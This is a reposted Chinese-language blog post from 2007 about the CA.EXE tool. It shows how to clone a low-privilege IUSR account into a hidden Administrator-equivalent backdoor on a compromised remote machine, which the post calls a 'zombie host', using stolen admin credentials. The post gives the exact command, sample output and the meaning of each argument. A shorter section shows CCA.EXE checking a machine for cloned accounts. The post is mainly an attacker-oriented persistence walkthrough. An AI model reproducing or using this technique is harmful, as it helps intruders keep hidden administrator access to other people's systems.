克隆admin!CA.EXE使駭客成為超級使用者(轉)

RegisterForBlog發表於2007-09-19
克隆admin!CA.EXE使駭客成為超級使用者(轉)[@more@]

  利用SA.exe 將Iusr_victim克隆為Administrator。

  C:>ca 192.168.0.1 test test iusr_victim password

  Clone Administrator, by netXeyes 2002/04/06

  Written by netXeyes 2002, dansnow@21cn.com

  Connect 192.168.0.1 ....OK

  Get SID of iusr_victim ....OK

  Prepairing ....OK

  Processing ....OK

  Clean Up ....OK

  這時,iusr_victim就成為了超級使用者,並有具有和Administrator同樣的設定(桌面、選單等等)。

  注:在ca 192.168.0.1 test test iusr_victim password 中,

  192.168.0.1是肉雞的IP地址;第一個test是你已經得到的肉雞上的管理員使用者名稱,第二個test是這個使用者名稱的密碼;iusr_victim是你想克隆的帳號,最後這個password就是你想給iusr_victim用的密碼。

  -------------------------------------------------------

  用CCA.EXE檢查是否存在克隆的帳號。

  不必改變ACL, 支援遠端檢查。

  C:>cca 192.168.0.29 administrator 123456

  Check Clone Account, by netXeyes 2002/04/29

  Written by netXeyes 2002, dansnow@21cn.com

  Connect 192.168.0.29 ....OK

  Prepairing ....OK

  Processing ....OK

  Checking ....

  Check Result:

  [DuDu] AS SAME AS [administrator]

  [Guest] AS SAME AS [administrator]

  [IUSR_RONG] AS SAME AS [administrator]

  [IWAM_RONG] AS SAME AS [administrator]

  [TEST] AS SAME AS [administrator]

  [xr] AS SAME AS [administrator]

  [Guest] AS SAME AS [DuDu]

  [IUSR_RONG] AS SAME AS [DuDu]

  這上面的DuDu,guest,IUSR_RONG等帳戶就已經是被克隆為administrator啦

  注意刪除克隆賬戶是小心一定注意。我試驗過很多機子刪除之後administrator賬戶不再超管組

  

·上一篇:

·下一篇:
 
     最新更新
·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·


| | | | | | |

Copyright © 2004 - 2007 All Rights Reserved

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10763080/viewspace-970156/,如需轉載,請註明出處,否則將追究法律責任。

克隆admin!CA.EXE使駭客成為超級使用者(轉)
請登入後發表評論 登入
全部評論

相關文章